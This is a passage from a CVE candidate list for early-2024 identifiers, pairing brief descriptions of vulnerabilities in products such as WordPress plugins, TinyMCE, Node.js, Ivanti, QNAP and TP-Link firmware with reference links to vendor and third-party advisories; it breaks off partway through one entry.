CVE    2024    2194    Candidate    The WP Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL search parameter in all versions up to, and including, 14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve    Assigned (20240305)
CVE    2024    2193    Candidate    A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths.    CERT-VN:VU#488902   |   URL:https://www.kb.cert.org/vuls/id/488902   |   FEDORA:FEDORA-2024-3a36322c4b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZON4TLXG7TG4A2XZG563JMVTGQW4SF3A/   |   MISC:https://download.vusec.net/papers/ghostrace_sec24.pdf   |   URL:https://download.vusec.net/papers/ghostrace_sec24.pdf   |   MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=944d5fe50f3f03daacfea16300e656a1691c4a23   |   URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=944d5fe50f3f03daacfea16300e656a1691c4a23   |   MISC:https://ibm.github.io/system-security-research-updates/2024/03/12/ghostrace   |   URL:https://ibm.github.io/system-security-research-updates/2024/03/12/ghostrace   |   MISC:https://kb.cert.org/vuls/id/488902   |   URL:https://kb.cert.org/vuls/id/488902   |   MISC:https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7016.html   |   URL:https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7016.html   |   MISC:https://www.vusec.net/projects/ghostrace/   |   URL:https://www.vusec.net/projects/ghostrace/   |   MISC:https://xenbits.xen.org/xsa/advisory-453.html   |   URL:https://xenbits.xen.org/xsa/advisory-453.html    Assigned (20240305)
CVE    2024    21917    Candidate    A vulnerability exists in Rockwell Automation FactoryTalk® Service Platform that allows a malicious user to obtain the service token and use it for authentication on another FTSP directory. This is due to the lack of digital signing between the FTSP service token and directory. If exploited, a malicious user could potentially retrieve user information and modify settings without any authentication.    MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1660.html   |   URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1660.html    Assigned (20240103)
CVE    2024    21916    Candidate    A denial-of-service vulnerability exists in specific Rockwell Automation ControlLogix and GuardLogix controllers. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF.    MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1661.html   |   URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1661.html    Assigned (20240103)
CVE    2024    21915    Candidate    A privilege escalation vulnerability exists in Rockwell Automation FactoryTalk® Service Platform (FTSP). If exploited, a malicious user with basic user group privileges could potentially sign into the software and receive FTSP Administrator Group privileges. A threat actor could potentially read and modify sensitive data, delete data and render the FTSP system unavailable.    MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1662.html   |   URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1662.html    Assigned (20240103)
CVE    2024    21914    Candidate    A vulnerability exists in the affected product that allows a malicious user to restart the Rockwell Automation PanelView™ Plus 7 terminal remotely without security protections. If the vulnerability is exploited, it could lead to the loss of view or control of the PanelView™ product.    MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1663.html   |   URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1663.html    Assigned (20240103)
CVE    2024    21911    Candidate    TinyMCE versions before 5.6.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user's browser.    MISC:https://github.com/advisories/GHSA-w7jx-j77m-wp65   |   URL:https://github.com/advisories/GHSA-w7jx-j77m-wp65   |   MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-w7jx-j77m-wp65   |   URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-w7jx-j77m-wp65   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-w7jx-j77m-wp65   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-w7jx-j77m-wp65   |   MISC:https://www.npmjs.com/package/tinymce   |   URL:https://www.npmjs.com/package/tinymce   |   MISC:https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes   |   URL:https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes    Assigned (20240103)
CVE    2024    21910    Candidate    TinyMCE versions before 5.10.0 are affected by a cross-site scripting vulnerability. A remote and unauthenticated attacker could introduce crafted image or link URLs that would result in the execution of arbitrary JavaScript in an editing user's browser.    MISC:https://github.com/advisories/GHSA-r8hm-w5f7-wj39   |   URL:https://github.com/advisories/GHSA-r8hm-w5f7-wj39   |   MISC:https://github.com/jazzband/django-tinymce/issues/366   |   URL:https://github.com/jazzband/django-tinymce/issues/366   |   MISC:https://github.com/jazzband/django-tinymce/releases/tag/3.4.0   |   URL:https://github.com/jazzband/django-tinymce/releases/tag/3.4.0   |   MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-r8hm-w5f7-wj39   |   URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-r8hm-w5f7-wj39   |   MISC:https://pypi.org/project/django-tinymce/3.4.0/   |   URL:https://pypi.org/project/django-tinymce/3.4.0/   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-r8hm-w5f7-wj39   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-r8hm-w5f7-wj39    Assigned (20240103)
CVE    2024    21909    Candidate    PeterO.Cbor versions 4.0.0 through 4.5.0 are vulnerable to a denial of service vulnerability. An attacker may trigger the denial of service condition by providing crafted data to the DecodeFromBytes or other decoding mechanisms in PeterO.Cbor. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition.    MISC:https://github.com/advisories/GHSA-6r92-cgxc-r5fg   |   URL:https://github.com/advisories/GHSA-6r92-cgxc-r5fg   |   MISC:https://github.com/peteroupc/CBOR/commit/b4117dbbb4cd5a4a963f9d0c9aa132f033e15b95   |   URL:https://github.com/peteroupc/CBOR/commit/b4117dbbb4cd5a4a963f9d0c9aa132f033e15b95   |   MISC:https://github.com/peteroupc/CBOR/compare/v4.5...v4.5.1   |   URL:https://github.com/peteroupc/CBOR/compare/v4.5...v4.5.1   |   MISC:https://github.com/peteroupc/CBOR/security/advisories/GHSA-6r92-cgxc-r5fg   |   URL:https://github.com/peteroupc/CBOR/security/advisories/GHSA-6r92-cgxc-r5fg   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-6r92-cgxc-r5fg   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-6r92-cgxc-r5fg    Assigned (20240103)
CVE    2024    21908    Candidate    TinyMCE versions before 5.9.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user's browser.    MISC:https://github.com/advisories/GHSA-5h9g-x5rv-25wg   |   URL:https://github.com/advisories/GHSA-5h9g-x5rv-25wg   |   MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-5h9g-x5rv-25wg   |   URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-5h9g-x5rv-25wg   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-5h9g-x5rv-25wg   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-5h9g-x5rv-25wg   |   MISC:https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes   |   URL:https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes    Assigned (20240103)
CVE    2024    21907    Candidate    Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition.    MISC:https://alephsecurity.com/2018/10/22/StackOverflowException/   |   URL:https://alephsecurity.com/2018/10/22/StackOverflowException/   |   MISC:https://alephsecurity.com/vulns/aleph-2018004   |   URL:https://alephsecurity.com/vulns/aleph-2018004   |   MISC:https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66   |   URL:https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66   |   MISC:https://github.com/JamesNK/Newtonsoft.Json/issues/2457   |   URL:https://github.com/JamesNK/Newtonsoft.Json/issues/2457   |   MISC:https://github.com/JamesNK/Newtonsoft.Json/pull/2462   |   URL:https://github.com/JamesNK/Newtonsoft.Json/pull/2462   |   MISC:https://github.com/advisories/GHSA-5crp-9r3c-p9vr   |   URL:https://github.com/advisories/GHSA-5crp-9r3c-p9vr   |   MISC:https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678   |   URL:https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr    Assigned (20240103)
CVE    2024    21901    Candidate    A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network. We have already fixed the vulnerability in the following versions: myQNAPcloud 1.0.52 (2023/11/24) and later; QTS 4.5.4.2627 build 20231225 and later.    MISC:https://www.qnap.com/en/security-advisory/qsa-24-09   |   URL:https://www.qnap.com/en/security-advisory/qsa-24-09    Assigned (20240103)
CVE    2024    21900    Candidate    An injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later; QuTS hero h5.1.3.2578 build 20231110 and later; QuTScloud c5.1.5.2651 and later.    MISC:https://www.qnap.com/en/security-advisory/qsa-24-09   |   URL:https://www.qnap.com/en/security-advisory/qsa-24-09    Assigned (20240103)
CVE    2024    21899    Candidate    An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later; QTS 4.5.4.2627 build 20231225 and later; QuTS hero h5.1.3.2578 build 20231110 and later; QuTS hero h4.5.4.2626 build 20231225 and later; QuTScloud c5.1.5.2651 and later.    MISC:https://www.qnap.com/en/security-advisory/qsa-24-09   |   URL:https://www.qnap.com/en/security-advisory/qsa-24-09    Assigned (20240103)
CVE    2024    21896    Candidate    The permission model protects itself against path traversal attacks by calling path.resolve() on any paths given by the user. If the path is to be treated as a Buffer, the implementation uses Buffer.from() to obtain a Buffer from the result of path.resolve(). By monkey-patching Buffer internals, namely, Buffer.prototype.utf8Write, the application can modify the result of path.resolve(), which leads to a path traversal vulnerability. This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.    MISC:https://hackerone.com/reports/2218653   |   URL:https://hackerone.com/reports/2218653    Assigned (20240103)
CVE    2024    21893    Candidate    A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.    MISC:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US   |   URL:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US    Assigned (20240103)
CVE    2024    21892    Candidate    On Linux, Node.js ignores certain environment variables if those may have been set by an unprivileged user while the process is running with elevated privileges with the only exception of CAP_NET_BIND_SERVICE. Due to a bug in the implementation of this exception, Node.js incorrectly applies this exception even when certain other capabilities have been set. This allows unprivileged users to inject code that inherits the process's elevated privileges.    CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0003/   |   MISC:https://hackerone.com/reports/2237545   |   URL:https://hackerone.com/reports/2237545    Assigned (20240103)
CVE    2024    21891    Candidate    Node.js depends on multiple built-in utility functions to normalize paths provided to node:fs functions, which can be overwritten with user-defined implementations leading to filesystem permission model bypass through a path traversal attack. This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.    CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0005/   |   MISC:https://hackerone.com/reports/2259914   |   URL:https://hackerone.com/reports/2259914    Assigned (20240103)
CVE    2024    21890    Candidate    The Node.js Permission Model does not clarify in the documentation that wildcards should be only used as the last character of a file path. For example: `--allow-fs-read=/home/node/.ssh/*.pub` will ignore `pub` and give access to everything after `.ssh/`. This misleading documentation affects all users using the experimental permission model in Node.js 20 and Node.js 21. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.    CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0002/   |   MISC:https://hackerone.com/reports/2257156   |   URL:https://hackerone.com/reports/2257156    Assigned (20240103)
CVE    2024    21888    Candidate    A privilege escalation vulnerability in web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows a user to elevate privileges to that of an administrator.    MISC:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US   |   URL:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US    Assigned (20240103)
CVE    2024    21887    Candidate    A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.    MISC:http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html   |   MISC:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US   |   URL:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US    Assigned (20240103)
CVE    2024    21886    Candidate    A heap buffer overflow flaw was found in the DisableDevice function in the X.Org server. This issue may lead to an application crash or, in some circumstances, remote code execution in SSH X11 forwarding environments.    MISC:RHBZ#2256542   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256542   |   MISC:RHSA-2024:0320   |   URL:https://access.redhat.com/errata/RHSA-2024:0320   |   MISC:RHSA-2024:0557   |   URL:https://access.redhat.com/errata/RHSA-2024:0557   |   MISC:RHSA-2024:0558   |   URL:https://access.redhat.com/errata/RHSA-2024:0558   |   MISC:RHSA-2024:0597   |   URL:https://access.redhat.com/errata/RHSA-2024:0597   |   MISC:RHSA-2024:0607   |   URL:https://access.redhat.com/errata/RHSA-2024:0607   |   MISC:RHSA-2024:0614   |   URL:https://access.redhat.com/errata/RHSA-2024:0614   |   MISC:RHSA-2024:0617   |   URL:https://access.redhat.com/errata/RHSA-2024:0617   |   MISC:RHSA-2024:0621   |   URL:https://access.redhat.com/errata/RHSA-2024:0621   |   MISC:RHSA-2024:0626   |   URL:https://access.redhat.com/errata/RHSA-2024:0626   |   MISC:RHSA-2024:0629   |   URL:https://access.redhat.com/errata/RHSA-2024:0629   |   MISC:https://access.redhat.com/security/cve/CVE-2024-21886   |   URL:https://access.redhat.com/security/cve/CVE-2024-21886    Assigned (20240102)
CVE    2024    21885    Candidate    A flaw was found in X.Org server. In the XISendDeviceHierarchyEvent function, it is possible to exceed the allocated array length when certain new device IDs are added to the xXIHierarchyInfo struct. This can trigger a heap buffer overflow condition, which may lead to an application crash or remote code execution in SSH X11 forwarding environments.    MISC:RHBZ#2256540   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256540   |   MISC:RHSA-2024:0320   |   URL:https://access.redhat.com/errata/RHSA-2024:0320   |   MISC:RHSA-2024:0557   |   URL:https://access.redhat.com/errata/RHSA-2024:0557   |   MISC:RHSA-2024:0558   |   URL:https://access.redhat.com/errata/RHSA-2024:0558   |   MISC:RHSA-2024:0597   |   URL:https://access.redhat.com/errata/RHSA-2024:0597   |   MISC:RHSA-2024:0607   |   URL:https://access.redhat.com/errata/RHSA-2024:0607   |   MISC:RHSA-2024:0614   |   URL:https://access.redhat.com/errata/RHSA-2024:0614   |   MISC:RHSA-2024:0617   |   URL:https://access.redhat.com/errata/RHSA-2024:0617   |   MISC:RHSA-2024:0621   |   URL:https://access.redhat.com/errata/RHSA-2024:0621   |   MISC:RHSA-2024:0626   |   URL:https://access.redhat.com/errata/RHSA-2024:0626   |   MISC:RHSA-2024:0629   |   URL:https://access.redhat.com/errata/RHSA-2024:0629   |   MISC:https://access.redhat.com/security/cve/CVE-2024-21885   |   URL:https://access.redhat.com/security/cve/CVE-2024-21885    Assigned (20240102)
CVE    2024    2188    Candidate    Cross-Site Scripting (XSS) vulnerability stored in TP-Link Archer AX50 affecting firmware version 1.0.11 build 2022052. This vulnerability could allow an unauthenticated attacker to create a port mapping rule via a SOAP request and store a malicious JavaScript payload within that rule, which could result in an execution of the JavaScript payload when the rule is loaded.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-tp-link-archer-ax50   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-tp-link-archer-ax50    Assigned (20240305)
CVE    2024    21875    Candidate    Allocation of Resources Without Limits or Throttling vulnerability in Badge leading to a denial of service attack.Team Hacker Hotel Badge 2024 on risc-v (billboard modules) allows Flooding.This issue affects Hacker Hotel Badge 2024: from 0.1.0 through 0.1.3.    MISC:https://csirt.divd.nl/CVE-2024-21875   |   URL:https://csirt.divd.nl/CVE-2024-21875   |   MISC:https://github.com/badgeteam/hackerhotel-2024-firmware-esp32c6/pull/64   |   URL:https://github.com/badgeteam/hackerhotel-2024-firmware-esp32c6/pull/64    Assigned (20240102)
CVE    2024    21869    Candidate    In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product stores plaintext credentials in various places. This may allow an attacker with local access to see them.    MISC:https://rapidscada.org/contact/   |   URL:https://rapidscada.org/contact/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03    Assigned (20240105)
CVE    2024    21866    Candidate    In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product responds back with an error message containing sensitive data if it receives a specific malformed request.    MISC:https://rapidscada.org/contact/   |   URL:https://rapidscada.org/contact/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03    Assigned (20240105)
CVE    2024    21865    Candidate    HGW BL1500HM Ver 002.001.013 and earlier contains a use of weak credentials issue. A network-adjacent unauthenticated attacker may connect to the product via SSH and use a shell.    MISC:https://jvn.jp/en/vu/JVNVU93546510/   |   URL:https://jvn.jp/en/vu/JVNVU93546510/   |   MISC:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/   |   URL:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/    Assigned (20240318)
CVE    2024    21863    Candidate    OpenHarmony v4.0.0 and prior versions allow a local attacker to cause a DoS through improper input.    MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md   |   URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md    Assigned (20240106)
CVE    2024    21860    Candidate    OpenHarmony v4.0.0 and prior versions allow an adjacent attacker to achieve arbitrary code execution in any app through a use after free.    MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md   |   URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md    Assigned (20240106)
CVE    2024    21852    Candidate    In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can supply a malicious configuration file by utilizing a Zip Slip vulnerability in the unpacking routine to achieve remote code execution.    MISC:https://rapidscada.org/contact/   |   URL:https://rapidscada.org/contact/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03    Assigned (20240105)
CVE    2024    21851    Candidate    OpenHarmony v4.0.0 and prior versions allow a local attacker to cause a heap overflow through integer overflow.    MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md   |   URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md    Assigned (20240106)
CVE    2024    21849    Candidate    When an Advanced WAF/ASM security policy and a Websockets profile are configured on a virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) process to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.    MISC:https://my.f5.com/manage/s/article/K000135873   |   URL:https://my.f5.com/manage/s/article/K000135873    Assigned (20240201)
CVE    2024    21840    Candidate    Incorrect Default Permissions vulnerability in Hitachi Storage Plug-in for VMware vCenter allows local users to read and write specific files. This issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.0.0 through 04.9.2.    MISC:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-108/index.html   |   URL:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-108/index.html    Assigned (20240110)
CVE    2024    2184    Candidate    Buffer overflow in identifier field of WSD probe request process of Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *: Satera MF740C Series/Satera MF640C Series/Satera LBP660C Series/Satera LBP620C Series firmware v12.07 and earlier, and Satera MF750C Series/Satera LBP670C Series firmware v03.09 and earlier sold in Japan. Color imageCLASS MF740C Series/Color imageCLASS MF640C Series/Color imageCLASS X MF1127C/Color imageCLASS LBP664Cdw/Color imageCLASS LBP622Cdw/Color imageCLASS X LBP1127C firmware v12.07 and earlier, and Color imageCLASS MF750C Series/Color imageCLASS X MF1333C/Color imageCLASS LBP674Cdw/Color imageCLASS X LBP1333C firmware v03.09 and earlier sold in US. i-SENSYS MF740C Series/i-SENSYS MF640C Series/C1127i Series/i-SENSYS LBP660C Series/i-SENSYS LBP620C Series/C1127P firmware v12.07 and earlier, and i-SENSYS MF750C Series/C1333i Series/i-SENSYS LBP673Cdw/C1333P firmware v03.09 and earlier sold in Europe.    MISC:https://psirt.canon/advisory-information/cp2024-002/   |   URL:https://psirt.canon/advisory-information/cp2024-002/    Assigned (20240305)
CVE    2024    21838    Candidate    Improper neutralization of special elements in output (CWE-74) used by the email generation feature of the Command Centre Server could lead to HTML code injection in emails generated by Command Centre. This issue affects: Gallagher Command Centre 9.00 prior to vEL9.00.1774 (MR2), 8.90 prior to vEL8.90.1751 (MR3), 8.80 prior to vEL8.80.1526 (MR4), 8.70 prior to vEL8.70.2526 (MR6), all versions of 8.60 and prior.    MISC:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-21838   |   URL:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-21838    Assigned (20240205)
CVE    2024    21836    Candidate    A heap-based buffer overflow vulnerability exists in the GGUF library header.n_tensors functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1915   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1915    Assigned (20240118)
CVE    2024    21833    Candidate    Multiple TP-LINK products allow a network-adjacent unauthenticated attacker with access to the product to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", Archer AXE75 firmware versions prior to "Archer AXE75(JP)_V1_231115", Deco X50 firmware versions prior to "Deco X50(JP)_V1_1.4.1 Build 20231122", and Deco XE200 firmware versions prior to "Deco XE200(JP)_V1_1.2.5 Build 20231120".    MISC:https://jvn.jp/en/vu/JVNVU91401812/   |   URL:https://jvn.jp/en/vu/JVNVU91401812/   |   MISC:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware    Assigned (20240104)
CVE    2024    21826    Candidate    OpenHarmony v3.2.4 and prior versions allow a local attacker to cause a sensitive information leak through insecure storage.    MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md   |   URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md    Assigned (20240106)
CVE    2024    21825    Candidate    A heap-based buffer overflow vulnerability exists in the GGUF library GGUF_TYPE_ARRAY/GGUF_TYPE_STRING parsing functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1912   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1912    Assigned (20240118)
CVE    2024    21824    Candidate    Improper authentication vulnerability exists in multiple printers and scanners which implement Web Based Management provided by BROTHER INDUSTRIES, LTD. If this vulnerability is exploited, a network-adjacent user who can access the product may impersonate an administrative user. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References].    MISC:https://jvn.jp/en/jp/JVN82749078/   |   URL:https://jvn.jp/en/jp/JVN82749078/   |   MISC:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000   |   URL:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000   |   MISC:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000   |   URL:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000   |   MISC:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html   |   URL:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html   |   MISC:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002   |   URL:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002   |   MISC:https://www.toshibatec.com/information/20240306_01.html   |   URL:https://www.toshibatec.com/information/20240306_01.html    Assigned (20240209)
CVE    2024    21821    Candidate    Multiple TP-LINK products allow a network-adjacent authenticated attacker to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", and Archer AXE75 firmware versions prior to "Archer AXE75(JP)_V1_231115".    MISC:https://jvn.jp/en/vu/JVNVU91401812/   |   URL:https://jvn.jp/en/vu/JVNVU91401812/   |   MISC:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-axe75/#Firmware    Assigned (20240104)
CVE    2024    2182    Candidate    A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.    FEDORA:FEDORA-2024-082155d6b7   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APR4GCVCMQD3DQUKXDNGIXCCYGE5V7IT/   |   FEDORA:FEDORA-2024-7c11edcd20   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XRKXOOOKD56TY3JQVB45N3GCTX3EG4BV/   |   FEDORA:FEDORA-2024-bf29e92de4   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CB4N522FCS4XWAPUKRWZF6QZ657FCIDF/   |   MISC:RHBZ#2267840   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2267840   |   MISC:RHSA-2024:1385   |   URL:https://access.redhat.com/errata/RHSA-2024:1385   |   MISC:RHSA-2024:1386   |   